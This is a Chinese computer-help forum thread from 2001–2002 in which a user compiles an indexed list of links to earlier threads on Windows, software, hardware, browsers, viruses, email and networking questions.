http://www.blueidea.com/bbs/NewsDetail.asp?id=356315

windows安装与卸载问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=305662
http://www.blueidea.com/bbs/NewsDetail.asp?id=308112
http://www.blueidea.com/bbs/NewsDetail.asp?id=308133
http://www.blueidea.com/bbs/NewsDetail.asp?id=301346
http://www.blueidea.com/bbs/NewsDetail.asp?id=294194
http://www.blueidea.com/bbs/NewsDetail.asp?id=293575
http://www.blueidea.com/bbs/NewsDetail.asp?id=295490
http://www.blueidea.com/bbs/NewsDetail.asp?id=322881
http://www.blueidea.com/bbs/NewsDetail.asp?id=330893
http://www.blueidea.com/bbs/NewsDetail.asp?id=337443
http://www.blueidea.com/bbs/NewsDetail.asp?id=345053
http://www.blueidea.com/bbs/NewsDetail.asp?id=300458

多操作系统安装问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=300458
http://www.blueidea.com/bbs/NewsDetail.asp?id=306802
http://www.blueidea.com/bbs/NewsDetail.asp?id=290111

msconfig、sysconfig等命令
http://www.blueidea.com/bbs/NewsDetail.asp?id=322656
http://www.blueidea.com/bbs/NewsDetail.asp?id=326852

3、软件问题
(1)抓图软件问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=293663
http://www.blueidea.com/bbs/NewsDetail.asp?id=325360
http://www.blueidea.com/bbs/NewsDetail.asp?id=325252
http://www.blueidea.com/bbs/NewsDetail.asp?id=322526
http://www.blueidea.com/bbs/NewsDetail.asp?id=336509
http://www.blueidea.com/bbs/NewsDetail.asp?id=358093

(2)虚拟光驱、ISO相关问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=357235
http://www.blueidea.com/bbs/NewsDetail.asp?id=294107
http://www.blueidea.com/bbs/NewsDetail.asp?id=322883
http://www.blueidea.com/bbs/NewsDetail.asp?id=325982
http://www.blueidea.com/bbs/NewsDetail.asp?id=357065

(3)QQ问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=330671
http://www.blueidea.com/bbs/NewsDetail.asp?id=296861
http://www.blueidea.com/bbs/NewsDetail.asp?id=302675
http://www.blueidea.com/bbs/NewsDetail.asp?id=352015
http://www.blueidea.com/bbs/NewsDetail.asp?id=319239

(4)*.chm格式的制作及相关问题、HTML Help WorkShop 1.32
http://www.blueidea.com/bbs/newsdetail.asp?id=299591
http://www.blueidea.com/bbs/newsdetail.asp?id=299964
http://www.blueidea.com/bbs/newsdetail.asp?id=345949

4、硬件问题
(1)硬盘及分区
http://www.blueidea.com/bbs/NewsDetail.asp?id=304963
http://www.blueidea.com/bbs/NewsDetail.asp?id=304812
http://www.blueidea.com/bbs/NewsDetail.asp?id=300013
http://www.blueidea.com/bbs/NewsDetail.asp?id=298020
http://www.blueidea.com/bbs/NewsDetail.asp?id=359399

5、输入法
在WIN2000中五笔字形输入法如何加入
http://www.blueidea.com/bbs/NewsDetail.asp?id=320210
http://www.blueidea.com/bbs/NewsDetail.asp?id=326042

6、病毒
对尼姆达蠕虫的详细分析(转贴)
http://www.blueidea.com/bbs/NewsDetail.asp?id=356295

7、上网
ADSL上网常见问题集锦
http://www.blueidea.com/bbs/NewsDetail.asp?id=293118
ADSL宽带
http://www.blueidea.com/bbs/newsdetail.asp?id=268917&page=1

8、技巧文章
如何用98启动盘安装2000和XP！（不会请进）
http://www.blueidea.com/bbs/NewsDetail.asp?id=295490

win2k进程详解(转帖)
http://www.blueidea.com/bbs/NewsDetail.asp?id=289548

Opera 6.0 浏览中文网页不再有困惑（转）
http://www.blueidea.com/bbs/NewsDetail.asp?id=300529

关于windows的常见问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=322975

防止电脑死机二十五招（转）
http://www.blueidea.com/bbs/NewsDetail.asp?id=336458

CHM格式电子书制作详解
http://www.blueidea.com/bbs/newsdetail.asp?id=345949

计算机编程的24条法则(转贴)
http://www.blueidea.com/bbs/NewsDetail.asp?id=356256

[这消息被嘿嘿编辑过(编辑时间2001-12-06 04:15:31)]
[这消息被嘿嘿编辑过(编辑时间2001-12-06 05:44:02)]
[这消息被嘿嘿编辑过(编辑时间2002-01-21 11:35:12)]
[这消息被嘿嘿编辑过(编辑时间2002-01-23 05:02:46)]
[这消息被嘿嘿编辑过(编辑时间2002-05-09 21:15:10)]

缘是天定,份在人为.
嘿嘿

坏笑
积分：403
发帖：525
来自：
注册：2001-10-06
 发表于 2001-12-06 04:02:29 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
问题集锦(一)

1、更改被修改的IE浏览器的主页、收藏，title,右键等

http://www.blueidea.com/bbs/NewsDetail.asp?id=311850
http://www.blueidea.com/bbs/newsdetail.asp?id=197701&page=1
http://www.blueidea.com/bbs/newsdetail.asp?id=217888
http://www.blueidea.com/bbs/NewsDetail.asp?id=313063
http://www.blueidea.com/bbs/NewsDetail.asp?id=313080
http://www.blueidea.com/bbs/NewsDetail.asp?id=313125
http://www.blueidea.com/bbs/NewsDetail.asp?id=309678
http://www.blueidea.com/bbs/NewsDetail.asp?id=304515
http://www.blueidea.com/bbs/NewsDetail.asp?id=305566

2、Windows操作系统

关于WIN2000的日志问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=310692

装不了win2000 ！请高手高抬贵鼠！！
http://www.blueidea.com/bbs/NewsDetail.asp?id=305662

关于winxp的兼容性问题请教各位
http://www.blueidea.com/bbs/NewsDetail.asp?id=307653

要多大空间？
http://www.blueidea.com/bbs/NewsDetail.asp?id=308112

win2000安装参数
http://www.blueidea.com/bbs/NewsDetail.asp?id=308133

win2000professional中文版的版本号?谢谢!
http://www.blueidea.com/bbs/NewsDetail.asp?id=308086

WinXP中文正式版的版本号是多少？2600吗？
http://www.blueidea.com/bbs/NewsDetail.asp?id=305986

WIN2K pro自动重启问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=305034

请问怎么改变windows默认的一些图标！
http://www.blueidea.com/bbs/NewsDetail.asp?id=305784

Windows XP系统越来越慢了阿？
http://www.blueidea.com/bbs/NewsDetail.asp?id=298330

进入系统前的顺序选择~~
http://www.blueidea.com/bbs/NewsDetail.asp?id=300458

请教：安装win2k时....
http://www.blueidea.com/bbs/NewsDetail.asp?id=301346

WINXP的登录画面如何更换？
http://www.blueidea.com/bbs/NewsDetail.asp?id=296263

XP Group Policy 文档下载
http://www.blueidea.com/bbs/NewsDetail.asp?id=298588

WindowsXP 与 QQ2000 ？
http://www.blueidea.com/bbs/NewsDetail.asp?id=296861

在2000中升级XP好吗？
http://www.blueidea.com/bbs/NewsDetail.asp?id=295509

怎样将已经安装了汉化包的WINXP再改回英文版？
http://www.blueidea.com/bbs/NewsDetail.asp?id=296548

win2000怎么装
http://www.blueidea.com/bbs/NewsDetail.asp?id=294194

决定装XP，请大家帮忙解答几个问题，急！
http://www.blueidea.com/bbs/NewsDetail.asp?id=293575

如何用98启动盘安装2000和XP！（不会请进）
http://www.blueidea.com/bbs/NewsDetail.asp?id=295490

我的电脑在安装新软件的时候出现这样的提示
http://www.blueidea.com/bbs/NewsDetail.asp?id=293460

请教！！！WIN2000中系统资源在什么地方！！
http://www.blueidea.com/bbs/NewsDetail.asp?id=293220

用2000和XP的痛苦！！！
http://www.blueidea.com/bbs/NewsDetail.asp?id=290635

注册表问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=290782

有没有win2000下控制启动程序的软件？
http://www.blueidea.com/bbs/NewsDetail.asp?id=289583

win2k进程详解(转帖)
http://www.blueidea.com/bbs/NewsDetail.asp?id=289548

3、软件

realplayer
http://www.blueidea.com/bbs/NewsDetail.asp?id=309659

acdsee系列怎么有通病呀
http://www.blueidea.com/bbs/NewsDetail.asp?id=305928

DirectDraw在那下载？
http://www.blueidea.com/bbs/NewsDetail.asp?id=306382

为什么我装了acdsee4后还是无法查看ico文件？
http://www.blueidea.com/bbs/NewsDetail.asp?id=305626

如何用Acdsee批量转换图片（主要是大小）
http://www.blueidea.com/bbs/NewsDetail.asp?id=304027

请问各位大虾，*.chm文件怎么制作呀？
http://www.blueidea.com/bbs/newsdetail.asp?id=299591
http://www.blueidea.com/bbs/newsdetail.asp?id=299964

QQ怎么不靠边儿了？
http://www.blueidea.com/bbs/NewsDetail.asp?id=302675

哪个FTP软件可以在两个站点之间传送
http://www.blueidea.com/bbs/NewsDetail.asp?id=302800

死我了~~ pc刻mac格式的光盘~ 该怎么办?
http://www.blueidea.com/bbs/NewsDetail.asp?id=298911

用flashget怎样做批量下载？
http://www.blueidea.com/bbs/NewsDetail.asp?id=299201

做专业的ICON用什么软件比较好呢？
http://www.blueidea.com/bbs/NewsDetail.asp?id=298694

用editplus自己动手做资料扩展库
http://www.blueidea.com/bbs/NewsDetail.asp?id=295451

ISO的文件怎么办?
http://www.blueidea.com/bbs/NewsDetail.asp?id=294107

有没可能把一个index.htm文件刻在光盘上....
http://www.blueidea.com/bbs/NewsDetail.asp?id=295216

HyperSnap怎么抓取有滚动条的整个窗口？
http://www.blueidea.com/bbs/NewsDetail.asp?id=293663

请问两个基本问题：
http://www.blueidea.com/bbs/NewsDetail.asp?id=293463

一网吧?
http://www.blueidea.com/bbs/NewsDetail.asp?id=292487

请问有没有能截.rm格式的图象的软件
http://www.blueidea.com/bbs/NewsDetail.asp?id=292792

听说可以在PC上，虚拟安装MacOS，不知道有什么具体的解决
http://www.blueidea.com/bbs/NewsDetail.asp?id=289464

我的painter怎么花了?
http://www.blueidea.com/bbs/NewsDetail.asp?id=287588

对了,安装字体有什么软件可以预览字体吗?
http://www.blueidea.com/bbs/NewsDetail.asp?id=288843

ghost 2001可以克隆ntfs的Win2k吗？
http://www.blueidea.com/bbs/NewsDetail.asp?id=289588

关于VoptMe的问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=288929

关于IIS的问题，高手帮忙！
http://www.blueidea.com/bbs/NewsDetail.asp?id=289077

4、硬件

打印机！
http://www.blueidea.com/bbs/NewsDetail.asp?id=310961

买了一块60G的硬盘,我该怎么规划它啊?
http://www.blueidea.com/bbs/NewsDetail.asp?id=304963

郁闷，我的ibm硬盘
http://www.blueidea.com/bbs/NewsDetail.asp?id=304812

游戏杆
http://www.blueidea.com/bbs/NewsDetail.asp?id=302813

100M 和 10M 网卡的问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=298308

如何把大硬盘重新分区,而不格式化?
http://www.blueidea.com/bbs/NewsDetail.asp?id=300013

怎样释放硬盘空间
http://www.blueidea.com/bbs/NewsDetail.asp?id=298020

手提计算机和PC怎么样互联？急！
http://www.blueidea.com/bbs/NewsDetail.asp?id=297226

我的 SB! LIVE ......
http://www.blueidea.com/bbs/NewsDetail.asp?id=293255

关机变重启？
http://www.blueidea.com/bbs/NewsDetail.asp?id=293328

我想换内存，有好的牌子吗？
http://www.blueidea.com/bbs/NewsDetail.asp?id=292161

恢复数据
http://www.blueidea.com/bbs/NewsDetail.asp?id=291755

rambus还有前途吗？
http://www.blueidea.com/bbs/NewsDetail.asp?id=291838

如果设置电脑的开机密码
http://www.blueidea.com/bbs/NewsDetail.asp?id=290888

如何才能有效地提高系统内存？
http://www.blueidea.com/bbs/NewsDetail.asp?id=289669

5、浏览器

IE6怎么样？（ctrl+enter 会出错，中文版的bug）
http://www.blueidea.com/bbs/NewsDetail.asp?id=310843

关于IE浏览页面一个匪夷所思的问题。
http://www.blueidea.com/bbs/NewsDetail.asp?id=309666

关于IE下载图片问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=308144

Opera 6.0 浏览中文网页不再有困惑（转）
http://www.blueidea.com/bbs/NewsDetail.asp?id=300529

用Editplus的朋友可能要的东西
http://www.blueidea.com/bbs/NewsDetail.asp?id=300610

共享一个IE6小技巧~~~
http://www.blueidea.com/bbs/NewsDetail.asp?id=294119

IE的“清除历史记录”变灰了，不能用了，怎么办？
http://www.blueidea.com/bbs/NewsDetail.asp?id=292185

关于IE6的新麻烦
http://www.blueidea.com/bbs/NewsDetail.asp?id=288609

6、病毒

WIN32.FUNLOVE.4608是什么病毒?
http://www.blueidea.com/bbs/NewsDetail.asp?id=313513

紧急！W32.Nimda.E@mm ！！！
http://www.blueidea.com/bbs/NewsDetail.asp?id=307089

word中的问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=306417

TASKSVR32.EXE病毒/木马
http://www.blueidea.com/bbs/NewsDetail.asp?id=304164

我现在每个分区的根目录下面都有一个这样的文件。。。
http://www.blueidea.com/bbs/NewsDetail.asp?id=295699

计算机的网络病毒有哪些传播途径？
http://www.blueidea.com/bbs/NewsDetail.asp?id=292719

你们都用什么杀毒软件？！
http://www.blueidea.com/bbs/NewsDetail.asp?id=286357

7、E-mail及邮件软件

Outlook Express可以设置密码吗
http://www.blueidea.com/bbs/NewsDetail.asp?id=310818

如果Outlook Express出错，该如何解决？
http://www.blueidea.com/bbs/NewsDetail.asp?id=308642

IMail如何设置web登陆页面
http://www.blueidea.com/bbs/NewsDetail.asp?id=308580

关于imail 7中的smtp设置问题。急。。。
http://www.blueidea.com/bbs/NewsDetail.asp?id=295279

outlook怎么备份呢？
http://www.blueidea.com/bbs/NewsDetail.asp?id=290709

哪位高手，帮我解决一个foxmail的问题~~！急呀
http://www.blueidea.com/bbs/NewsDetail.asp?id=290865

8、局域网

还是关于局域网的问题，(已经成功啦哈哈哈)
http://www.blueidea.com/bbs/NewsDetail.asp?id=311811

请问在局域网中设置域有什么好处？该如何设置？
http://www.blueidea.com/bbs/NewsDetail.asp?id=300547

斑竹，我的问题来了！
http://www.blueidea.com/bbs/NewsDetail.asp?id=309558

网络连接问题！~~~
http://www.blueidea.com/bbs/NewsDetail.asp?id=299221

请教一个关于局域网的问题！！！
http://www.blueidea.com/bbs/NewsDetail.asp?id=296672

关于win2k共享上网
http://www.blueidea.com/bbs/NewsDetail.asp?id=290622

ip地址
http://www.blueidea.com/bbs/NewsDetail.asp?id=287757

9、输入法

中文机器可以安装日文输入法嘛？
http://www.blueidea.com/bbs/NewsDetail.asp?id=313556

10、Linux
winme与Xteam linux并存？
http://www.blueidea.com/bbs/NewsDetail.asp?id=306802

怎样在win2000上再装linux同时怎么使用
http://www.blueidea.com/bbs/NewsDetail.asp?id=290111

LINUX下拨号上网
http://www.blueidea.com/bbs/NewsDetail.asp?id=288693

有没有人为我的机子在Linux下算个命！
http://www.blueidea.com/bbs/NewsDetail.asp?id=290224

11、上网
ADSL上网常见问题集锦
http://www.blueidea.com/bbs/NewsDetail.asp?id=293118

有没有在上海用ADSL的？？？？
http://www.blueidea.com/bbs/NewsDetail.asp?id=290064

ADSL宽带装好了，盟军2的正版也买了 (页 1)
http://www.blueidea.com/bbs/newsdetail.asp?id=268917

12、其他
.mht是什么格式的文件，为什么能用浏览器打开？
http://www.blueidea.com/bbs/NewsDetail.asp?id=310319

做了一个关于文件扩展名的帮助文件
http://www.blueidea.com/bbs/NewsDetail.asp?id=312897

怎样上传超限文件?
http://www.blueidea.com/bbs/NewsDetail.asp?id=312613

如何制作光盘启动盘？急！谢谢
http://www.blueidea.com/bbs/NewsDetail.asp?id=310924

怎样在windows下安装php与mysql?
http://www.blueidea.com/bbs/NewsDetail.asp?id=306193

关于子网掩码换算最大主机数的问题？
http://www.blueidea.com/bbs/newsdetail.asp?id=300569

通用文件扩展名详细列表
http://www.blueidea.com/bbs/NewsDetail.asp?id=303551

键盘键值
http://www.blueidea.com/bbs/NewsDetail.asp?id=299021

谁知道rest：//……是什么协议？
http://www.blueidea.com/bbs/NewsDetail.asp?id=299651

[这消息被嘿嘿编辑过(编辑时间2001-12-06 04:07:37)]
[这消息被嘿嘿编辑过(编辑时间2001-12-06 05:51:11)]
[这消息被嘿嘿编辑过(编辑时间2002-01-23 05:04:36)]

缘是天定,份在人为.
huangtr

高级用户
积分：252
发帖：93
来自：杭州
注册：2001-12-29
 发表于 2002-01-21 12:48:52 按此观看huangtr的个人资料 该用户不允许显示它的电子邮件 huangtr 的 oicq 是581778,查看 581778 的资料 发送悄悄话给huangtr 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看huangtr的IP
能不能做成chm文件阿,这样看很费劲

路漫漫,前途不可预测;
为了心中的那个理想,
我决定不断前行......
come on
嘿嘿

坏笑
积分：403
发帖：525
来自：
注册：2001-10-06
 发表于 2002-01-23 04:06:40 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
问题集锦(二)

12.7-1.22

1、更改被修改的IE浏览器的主页、收藏，title,右键等

IE相关反修改集粹
http://www.blueidea.com/bbs/NewsDetail.asp?id=327692

求助!!IE右键菜单被添了东西怎么改回来!!
http://www.blueidea.com/bbs/NewsDetail.asp?id=315896

请教关于更改IE默认页的问题......
http://www.blueidea.com/bbs/NewsDetail.asp?id=320978

2、Windows操作系统

帮帮忙吧！关于WINDOWS XP的问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=315303

注册表被禁用
http://www.blueidea.com/bbs/NewsDetail.asp?id=314906

WIN2000的SYSTEM32目录已经大的怕人了，怎么办！
http://www.blueidea.com/bbs/NewsDetail.asp?id=314929

为什么安装xp后会这样？？
http://www.blueidea.com/bbs/NewsDetail.asp?id=316384

怎么样才可以完全的删掉win xp??
http://www.blueidea.com/bbs/NewsDetail.asp?id=322881

XP目前有多少种版本？
http://www.blueidea.com/bbs/NewsDetail.asp?id=324283

在XP中如何将磁盘的格式转换成NTFS格式？？？
http://www.blueidea.com/bbs/NewsDetail.asp?id=322607

关于windows的常见问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=322975

msconfig、sysconfig等命令
http://www.blueidea.com/bbs/NewsDetail.asp?id=322656
http://www.blueidea.com/bbs/NewsDetail.asp?id=326852

在xp里，我一开电脑就自动上网。我不想这样，怎算？
http://www.blueidea.com/bbs/NewsDetail.asp?id=324628

如何完全的把windows改成mac？
http://www.blueidea.com/bbs/NewsDetail.asp?id=325999

"显示桌面"不见了
http://www.blueidea.com/bbs/NewsDetail.asp?id=328093

如何能调试出待机
http://www.blueidea.com/bbs/NewsDetail.asp?id=328529

如何才能有效地提高系统内存？
http://www.blueidea.com/bbs/NewsDetail.asp?id=289669

2000 server版，要升级到XP
http://www.blueidea.com/bbs/NewsDetail.asp?id=330893

防止电脑死机二十五招（转）
http://www.blueidea.com/bbs/NewsDetail.asp?id=336458

没次开机器空的回收站都显示满：（怎么改好？
http://www.blueidea.com/bbs/NewsDetail.asp?id=336579

win2000的IE历史文件列表都放在哪里？
http://www.blueidea.com/bbs/NewsDetail.asp?id=337469

关于WIN2000的日志问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=310692

如何创建XP的启动盘！！！如何卸载XP！！！
http://www.blueidea.com/bbs/NewsDetail.asp?id=337443

进入系统前的顺序选择~~
http://www.blueidea.com/bbs/NewsDetail.asp?id=300458

紧急求助啊！为什么我的电脑不能打开文本文件啊？
http://www.blueidea.com/bbs/NewsDetail.asp?id=343371

NT2000下怎么打开COOKIE选项呀
http://www.blueidea.com/bbs/NewsDetail.asp?id=341895

关于Windows98thOEM第三版
http://www.blueidea.com/bbs/NewsDetail.asp?id=345053

在Win2K或XP里，如何赋予Guest或PowerUser
http://www.blueidea.com/bbs/NewsDetail.asp?id=345736

win2K的安装问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=342307

Win2K里的服务
http://www.blueidea.com/bbs/NewsDetail.asp?id=350855

一个行之有效的防止winXP任务栏假死的方法
http://www.blueidea.com/bbs/NewsDetail.asp?id=350149

WindowsXP 与 QQ2000 ？
http://www.blueidea.com/bbs/NewsDetail.asp?id=296861

做一个好的windows管家
http://www.blueidea.com/bbs/NewsDetail.asp?id=352362

xp下的qq
http://www.blueidea.com/bbs/NewsDetail.asp?id=352015

我的天 xp 简直就是硬盘杀手
http://www.blueidea.com/bbs/NewsDetail.asp?id=350131

98有个不是很好的东西，就是一启动就会有一个对话框，要求输入密码~
http://www.blueidea.com/bbs/NewsDetail.asp?id=351586

无法自动进入win98求教高手
http://www.blueidea.com/bbs/NewsDetail.asp?id=353206

不能完全关机在CMOS里怎么改
http://www.blueidea.com/bbs/NewsDetail.asp?id=356315

2000怎么加速访问局域网中的98
http://www.blueidea.com/bbs/NewsDetail.asp?id=359035

3、软件

彻底删除DW和FW的方法?(添删项里没有该程序，本身也不带）
http://www.blueidea.com/bbs/NewsDetail.asp?id=317464

急，如何解压这种格式的文件database.zip.JC!
http://www.blueidea.com/bbs/NewsDetail.asp?id=316812

PWS
http://www.blueidea.com/bbs/NewsDetail.asp?id=315938

有谁知道将OICQ改头换面的软件或者别的方法？？？
http://www.blueidea.com/bbs/NewsDetail.asp?id=319239

网吧里会员的帐号的上金额变$$$$(万象幻境)
http://www.blueidea.com/bbs/NewsDetail.asp?id=316692

有谁能推荐一个好用的给文件夹加锁的软件？
http://www.blueidea.com/bbs/NewsDetail.asp?id=315883

请教SQL Server 2000的安装
http://www.blueidea.com/bbs/NewsDetail.asp?id=319307

JJX的那个ActiveContent是个什么东东？
http://www.blueidea.com/bbs/NewsDetail.asp?id=318781

ＳＯＳ！找造字程序
http://www.blueidea.com/bbs/NewsDetail.asp?id=319266

安装office出现的错误提示？
http://www.blueidea.com/bbs/NewsDetail.asp?id=323003

Office XP 后遗症-_-
http://www.blueidea.com/bbs/NewsDetail.asp?id=323243

安装iso文件的软件是什么名字？
http://www.blueidea.com/bbs/NewsDetail.asp?id=322883

求救，如何将mp3转成rm 格式？
http://www.blueidea.com/bbs/NewsDetail.asp?id=325696

有什么工具能够 抓下超出一屏的页面。。。
http://www.blueidea.com/bbs/NewsDetail.asp?id=325360

最佳截屏软件SnagIt 6下载
http://www.blueidea.com/bbs/NewsDetail.asp?id=325252

问：你们是用什么软件东西截图的？
http://www.blueidea.com/bbs/NewsDetail.asp?id=322526

DirectX8.1.
http://www.blueidea.com/bbs/NewsDetail.asp?id=325140

有什么办法把CD转成ISO等光盘镜像文件吗
http://www.blueidea.com/bbs/NewsDetail.asp?id=325982

vb上面怎么安装mdsn Library？
http://www.blueidea.com/bbs/NewsDetail.asp?id=327255

VMware 模拟器
http://www.blueidea.com/bbs/NewsDetail.asp?id=327434

请推荐：刻盘用什么软件
http://www.blueidea.com/bbs/NewsDetail.asp?id=327495

如何在PC机上安装APPLE的MacOS系统？
http://www.blueidea.com/bbs/NewsDetail.asp?id=326809

一用Ctrl+enter发送qq消息 就会重启
http://www.blueidea.com/bbs/NewsDetail.asp?id=330671

DW4为何粘贴中文会变成问号？
http://www.blueidea.com/bbs/NewsDetail.asp?id=328187

安装字体有什么软件可以预览字体吗?
http://www.blueidea.com/bbs/NewsDetail.asp?id=288843

请问如何将VCD的歌压成MP3的歌？
http://www.blueidea.com/bbs/NewsDetail.asp?id=330998

哪种刻录软件好用？
http://www.blueidea.com/bbs/NewsDetail.asp?id=334238

用snagit6怎样完全抓取带滚屏的页面？？？
http://www.blueidea.com/bbs/NewsDetail.asp?id=336509

一个word的问题,对齐右边...
http://www.blueidea.com/bbs/NewsDetail.asp?id=339044

请问怎么打开.iso文件，急！
http://www.blueidea.com/bbs/NewsDetail.asp?id=342031

CHM格式电子书制作详解
http://www.blueidea.com/bbs/newsdetail.asp?id=345949

寻找可以制作VCD、电脑两用光盘的软件？
http://www.blueidea.com/bbs/NewsDetail.asp?id=338340

realplayer播放器的插件存在什么地方了？
http://www.blueidea.com/bbs/NewsDetail.asp?id=352438

有什么软件能取出图片中的中英文字吗？
http://www.blueidea.com/bbs/NewsDetail.asp?id=352380

请问如何清除媒体播放器7。0和REALPLAY的历史记录？
http://www.blueidea.com/bbs/NewsDetail.asp?id=349553

如何压缩成*.cab格式的文件
http://www.blueidea.com/bbs/NewsDetail.asp?id=351711

网上down的.pdf文件无法用Acrobat 打开？
http://www.blueidea.com/bbs/NewsDetail.asp?id=354050

大家都用什么虚拟光驱软件？
http://www.blueidea.com/bbs/NewsDetail.asp?id=357235

DFI 文件是什么格式?用什么工具打开?
http://www.blueidea.com/bbs/NewsDetail.asp?id=357321

请教：ISO 文件 是什么压缩格式的？用什么文件打开
http://www.blueidea.com/bbs/NewsDetail.asp?id=357065

怎样把录像带转换成rm文件？
http://www.blueidea.com/bbs/NewsDetail.asp?id=354808

推荐一个屏幕动态抓取软件
http://www.blueidea.com/bbs/NewsDetail.asp?id=358093

为什么我得windows media不可以拖进度条
http://www.blueidea.com/bbs/NewsDetail.asp?id=359397

4、硬件
显卡是hp，显示器是dell，装驱动应装hp？
http://www.blueidea.com/bbs/NewsDetail.asp?id=319248

声卡爆音吓死人！
http://www.blueidea.com/bbs/NewsDetail.asp?id=323806

请教一下:modern安装
http://www.blueidea.com/bbs/NewsDetail.asp?id=324990

搞到个插在打印机借口上的游戏手柄 不知道怎么装驱动
http://www.blueidea.com/bbs/NewsDetail.asp?id=324095

怎样屏敝掉主板自的声卡
http://www.blueidea.com/bbs/NewsDetail.asp?id=326616

最近几天开机是机器出现异响
http://www.blueidea.com/bbs/NewsDetail.asp?id=324991

我的磐英Bx-5能否用赛扬2-800cpu
http://www.blueidea.com/bbs/NewsDetail.asp?id=328396

两按键鼠标可当作三键用？
http://www.blueidea.com/bbs/NewsDetail.asp?id=328993

BIOSaward命令求解
http://www.blueidea.com/bbs/NewsDetail.asp?id=330650

软驱问题，（无论打开那一张软盘，都显示最先一张盘的内容，刷新也没用）
http://www.blueidea.com/bbs/NewsDetail.asp?id=337483

蓝色的朋友，我的EPSON打印机打不出蓝色啦！！
http://www.blueidea.com/bbs/NewsDetail.asp?id=345484

怎么样更新主板的bios
http://www.blueidea.com/bbs/NewsDetail.asp?id=353666

如何让我得新加得硬盘得分区排在老硬盘得后面
http://www.blueidea.com/bbs/NewsDetail.asp?id=359399

5、浏览器
用什么修改IE右上的那个难看的带着窗户还一直转的地球
http://www.blueidea.com/bbs/NewsDetail.asp?id=313420

ie6的BUG(co.cn/ ...)
http://www.blueidea.com/bbs/NewsDetail.asp?id=320605

如何去除打印html页面时的标题，页码和时间？
http://www.blueidea.com/bbs/NewsDetail.asp?id=325610

Cookie可以备份吗？
http://www.blueidea.com/bbs/NewsDetail.asp?id=334691

浏览器窗口的问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=340648

IE浏览器在全屏状态下可以输入网址吗
http://www.blueidea.com/bbs/NewsDetail.asp?id=353713

为什么xp下的IE启动很慢？
http://www.blueidea.com/bbs/NewsDetail.asp?id=352133

6、病毒
WIN32.FUNLOVE.4608是什么病毒?
http://www.blueidea.com/bbs/NewsDetail.asp?id=313513

nimada怎么杀干净？？？
http://www.blueidea.com/bbs/NewsDetail.asp?id=356170

对尼姆达蠕虫的详细分析(转贴)
http://www.blueidea.com/bbs/NewsDetail.asp?id=356295

7、E-mail及邮件软件

有关foxmail的一个问题,大虾们遇到过吗?
http://www.blueidea.com/bbs/NewsDetail.asp?id=320014

紧急求助!我有个flash图片，想把它放在邮件里怎么样可以直
http://www.blueidea.com/bbs/NewsDetail.asp?id=330263

好像是"木马邮件"
http://www.blueidea.com/bbs/NewsDetail.asp?id=338823

8、局域网

怎样实现LAN共享上网
http://www.blueidea.com/bbs/NewsDetail.asp?id=314792

怎么在WIN2000下查找网卡的物理地址
http://www.blueidea.com/bbs/NewsDetail.asp?id=314346

server应该使用什么防火墙？
http://www.blueidea.com/bbs/NewsDetail.asp?id=316746

两台计算机，不装网卡，能不能实现共享上网？
http://www.blueidea.com/bbs/NewsDetail.asp?id=316032

为什么家庭两机共享总是设置不好
http://www.blueidea.com/bbs/NewsDetail.asp?id=318159

关于局域网维护的资料
http://www.blueidea.com/bbs/NewsDetail.asp?id=320613

局域网中XP无法访问的问题？？？？
http://www.blueidea.com/bbs/NewsDetail.asp?id=321211

访问远端的局域网的方法有多少？
http://www.blueidea.com/bbs/NewsDetail.asp?id=320066

adsl怎么一个端口几台机共享？
http://www.blueidea.com/bbs/NewsDetail.asp?id=324423

关于adsl的局域网设置问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=334393

分配IP
http://www.blueidea.com/bbs/NewsDetail.asp?id=342260

如何在局域网里架设自己的ftp服务器？
http://www.blueidea.com/bbs/NewsDetail.asp?id=344128

关于 局域网的问题，虚拟服务器，请进！！！
http://www.blueidea.com/bbs/NewsDetail.asp?id=349026

11、上网及网络相关

gopher是什么协议？
http://www.blueidea.com/bbs/NewsDetail.asp?id=314503

我在新网chindns申请的域名指向在万网的页面有没有问题？
http://www.blueidea.com/bbs/NewsDetail.asp?id=316334

我有一个关于网页设计的问题？
http://www.blueidea.com/bbs/NewsDetail.asp?id=322230

我的几个realplayer文件的歌没地方放了。
http://www.blueidea.com/bbs/NewsDetail.asp?id=324223

宽带上网用什么下载工具最爽
http://www.blueidea.com/bbs/NewsDetail.asp?id=322739

关于URL指向的问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=325330

在WIN2000中如何连接ADSL吗？
http://www.blueidea.com/bbs/NewsDetail.asp?id=325237

0x3d.0x88.0x3f.0x28 这个ip好奇怪
http://www.blueidea.com/bbs/NewsDetail.asp?id=327513

在局域网内也能看到可是在别的地方却看不到，提示找不到服务器...
http://www.blueidea.com/bbs/NewsDetail.asp?id=328151

我的代理服务器出了什么问题？？
http://www.blueidea.com/bbs/NewsDetail.asp?id=326613

怎样设置FTP服务器？？
http://www.blueidea.com/bbs/NewsDetail.asp?id=333980

我想做虚拟主机服务商，买什么档次的服务器好，什么价位？
